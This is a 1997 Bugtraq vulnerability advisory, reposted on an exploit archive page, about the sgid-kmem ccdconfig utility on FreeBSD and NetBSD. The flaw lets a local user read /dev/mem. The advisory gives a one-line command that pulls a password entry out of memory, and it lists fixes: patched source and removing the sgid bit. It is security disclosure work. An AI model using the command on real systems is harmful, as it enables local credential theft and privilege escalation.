ccdconfig sgid kmem BSD exploit

Summary
Description:ccdconfig is sgid kmem and can be exploited to read /dev/mem . It shouldn't be too tough to leverage this into root access.
Author:Niall Smart <rotel@INDIGO.IE>
Compromise: root (local)
Vulnerable Systems:NetBSD, FreeBSD, older version of OpenBSD
Date:31 December 1997
Details


Date: Wed, 31 Dec 1997 02:02:31 +0000
From: Niall Smart <rotel@INDIGO.IE>
To: BUGTRAQ@NETSPACE.ORG
Subject: Vulnerability in ccdconfig

Hi,

FreeBSD and NetBSD's ccdconfig doesn't do proper checking of the
argument to -f:

[nsmart@ginseng ~]$ ccdconfig -U -f /dev/mem 2>&1 | strings | grep Charlie
root:iDeLeTeDiT:0:0::0:0:Charlie: No such file or directory
^C

I had to cat /etc/master.passwd in another window to get this to
work though :) So perhaps its not very easily exploitable, but
is worth fixing nonetheless.

This bug was also spotted by olivier@secnet.com and fixed in OpenBSD
some time ago.

Fixes:

 * FreeBSD and NetBSD have been notified of the problem and have fixed
   it in their source tree's as of yesterday  (FreeBSD-current,
   FreeBSD-stable, NetBSD-current)  Retrieve the patched ccdconfig.c
   and compile yourself a new ccdconfig.

 * "chmod g-s /sbin/ccdconfig". I can't think of any reason for it to be
   sgid kmem.


Regards,

Niall

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault